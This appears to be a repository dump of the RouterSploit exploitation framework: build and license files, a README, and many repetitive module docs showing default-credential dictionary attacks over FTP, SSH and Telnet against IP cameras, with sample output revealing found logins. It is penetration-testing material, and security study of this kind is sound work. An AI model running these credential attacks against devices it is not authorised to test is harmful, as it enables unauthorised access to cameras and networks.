/routersploit USER rts COPY requirements.txt . RUN pip install --user --no-cache-dir -r requirements.txt COPY routersploit routersploit COPY rsf.py rsf.py # Not actually needed since present in docker-compose already CMD ["python", "rsf.py"] ================================================ FILE: LICENSE ================================================ Copyright 2018, The RouterSploit Framework (RSF) by Threat9 All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of RouterSploit Framework nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. The above licensing was taken from the BSD licensing and is applied to RouterSploit Framework as well. Note that the RouterSploit Framework is provided as is, and is a royalty free open-source application. Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit. 
================================================ FILE: MANIFEST.in ================================================ recursive-include routersploit/resources/ssh_keys *.json *.key recursive-include routersploit/resources/vendors *.dat recursive-include routersploit/resources/wordlists *.txt ================================================ FILE: Makefile ================================================ .PHONY: build run test lint lint-modules clean prune help DIRECTORY=. EXCLUDED=.git,rsf.py RSF_IMAGE=routersploit FLAKE8_IGNORED_RULES=E501,F405,F403,W504 build: docker build -t $(RSF_IMAGE) . run: docker run -it --rm $(RSF_IMAGE) lint: python3 -m flake8 --exclude=$(EXCLUDED) --ignore=$(FLAKE8_IGNORED_RULES) $(DIRECTORY) tests: clean python3 -m pytest -n16 tests/core/ tests/test_exploit_scenarios.py tests/test_module_info.py python3 -m pytest -n16 tests/exploits/ tests/creds/ tests/encoders/ tests/generic/ tests/payloads/ clean: find . -name '*.pyc' -delete find . -name '*.pyo' -delete find . -name '*~' -delete prune: docker images -q -f dangling=true | xargs docker rmi docker ps -q -f status=exited | xargs docker rm help: @echo " run" @echo " Run Routersploit in docker container" @echo " lint" @echo " Check style with flake8." @echo " test" @echo " Run test suite" @echo " clean" @echo " Remove python artifacts." @echo " prune" @echo " Remove dangling docker images and exited containers." ================================================ FILE: README.md ================================================ # RouterSploit - Exploitation Framework for Embedded Devices [![Python 3.6](https://img.shields.io/badge/Python-3.6-yellow.svg)](http://www.python.org/download/) [![Build Status](https://travis-ci.org/threat9/routersploit.svg?branch=master)](https://travis-ci.org/threat9/routersploit) # Community Join community on [Embedded Exploitation Discord](https://discord.gg/UCXARN2vBx). 
# Description The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. [![asciicast](https://asciinema.org/a/180370.png)](https://asciinema.org/a/180370) It consists of various modules that aid penetration testing operations: * exploits - modules that take advantage of identified vulnerabilities * creds - modules designed to test credentials against network services * scanners - modules that check if a target is vulnerable to any exploit * payloads - modules that are responsible for generating payloads for various architectures and injection points * generic - modules that perform generic attacks # Installation ## Requirements Required: * requests * paramiko * pysnmp * pycrypto Optional: * bluepy - Bluetooth low energy ## Installation on Kali Linux ``` apt-get install python3-pip git clone https://www.github.com/threat9/routersploit cd routersploit python3 -m pip install -r requirements.txt python3 rsf.py ``` Bluetooth Low Energy support: ``` apt-get install libglib2.0-dev python3 -m pip install bluepy python3 rsf.py ``` ## Installation on Ubuntu 20.04 ``` sudo apt-get install git python3-pip git clone https://github.com/threat9/routersploit cd routersploit python3 -m pip install -r requirements.txt python3 rsf.py ``` Bluetooth Low Energy support: ``` sudo apt-get install libglib2.0-dev python3 -m pip install bluepy python3 rsf.py ``` ## Installation on Ubuntu 18.04 & 17.10 ``` sudo add-apt-repository universe sudo apt-get install git python3-pip git clone https://www.github.com/threat9/routersploit cd routersploit python3 -m pip install setuptools python3 -m pip install -r requirements.txt python3 rsf.py ``` Bluetooth Low Energy support: ``` apt-get install libglib2.0-dev python3 -m pip install bluepy python3 rsf.py ``` ## Installation on OSX ``` git clone https://www.github.com/threat9/routersploit cd routersploit sudo python3 -m pip install -r requirements.txt python3 rsf.py ``` ## Running on Docker ``` git clone 
https://www.github.com/threat9/routersploit cd routersploit docker compose up --build -d docker attach routersploit ``` ### To run again without rebuild ``` docker start routersploit docker attach routersploit ``` # Update Update RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day. ``` cd routersploit git pull ``` # Build your own To our surprise, people started to fork [routersploit](https://github.com/threat9/routersploit) not because they were interested in the security of embedded devices but simply because they wanted to leverage our interactive shell logic and build their tools using a similar concept. All these years they must have said: _"There must be a better way!"_ and they were completely right; the better way is called [_Riposte_](https://github.com/fwkz/riposte). [_Riposte_](https://github.com/fwkz/riposte) allows you to easily wrap your application inside a tailored interactive shell. Common chores of building REPLs have been factored out and are taken care of, so you can focus on the specific domain logic of your application. # License The RouterSploit Framework is under a BSD license. Please see [LICENSE](LICENSE) for more details. # Acknowledgments * [riposte](https://github.com/fwkz/riposte) ================================================ FILE: docker-compose.yaml ================================================ services: routersploit: build: context: . dockerfile: Dockerfile container_name: routersploit environment: - PYTHONUNBUFFERED=1 stdin_open: true tty: true command: ["python","rsf.py"] ================================================ FILE: docs/modules/creds/cameras/acti/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Acti Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2.
Do: `use creds/cameras/acti/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/acti/ftp_default_creds rsf (Acti Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Acti Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/acti/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Acti Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/acti/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/acti/ssh_default_creds rsf (Acti Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Acti Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... 
[-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/acti/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Acti Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/acti/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/acti/telnet_default_creds rsf (Acti Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Acti Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/american_dynamics/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against American Dynamics Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/american_dynamics/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/american_dynamics/ftp_default_creds rsf (American Dynamics Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (American Dynamics Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/american_dynamics/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against American Dynamics Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2.
Do: `use creds/cameras/american_dynamics/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/american_dynamics/ssh_default_creds rsf (American Dynamics Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (American Dynamics Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/american_dynamics/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against American Dynamics Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/american_dynamics/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/american_dynamics/telnet_default_creds rsf (American Dynamics Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (American Dynamics Camera Default Telnet Creds) > run [*] Running module... 
[*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/arecont/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Arecont Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/arecont/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/arecont/ftp_default_creds rsf (Arecont Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Arecont Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/arecont/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Arecont Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/arecont/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/arecont/ssh_default_creds rsf (Arecont Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Arecont Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/arecont/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Arecont Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. 
Do: `use creds/cameras/arecont/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/arecont/telnet_default_creds rsf (Arecont Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Arecont Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/avigilon/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Avigilon Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/avigilon/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/avigilon/ftp_default_creds rsf (Avigilon Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Avigilon Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... 
[-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/avigilon/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Avigilon Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/avigilon/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/avigilon/ssh_default_creds rsf (Avigilon Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Avigilon Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/avigilon/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Avigilon Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/avigilon/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/avigilon/telnet_default_creds rsf (Avigilon Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Avigilon Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/avtech/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Avtech Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. 
Do: `use creds/cameras/avtech/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/avtech/ftp_default_creds rsf (Avtech Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Avtech Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/avtech/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Avtech Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/avtech/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/avtech/ssh_default_creds rsf (Avtech Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Avtech Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... 
[-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/avtech/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Avtech Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/avtech/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/avtech/telnet_default_creds rsf (Avtech Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Avtech Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/axis/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Axis Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/axis/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/axis/ftp_default_creds rsf (Axis Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Axis Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/axis/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Axis Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/axis/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. 
If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/axis/ssh_default_creds rsf (Axis Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Axis Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/axis/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Axis Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/axis/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/axis/telnet_default_creds rsf (Axis Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Axis Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... 
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/basler/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Basler Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/basler/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/basler/ftp_default_creds rsf (Basler Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Basler Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/basler/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Basler Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/basler/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/basler/ssh_default_creds rsf (Basler Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Basler Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/basler/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Basler Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/basler/telnet_default_creds` 3. 
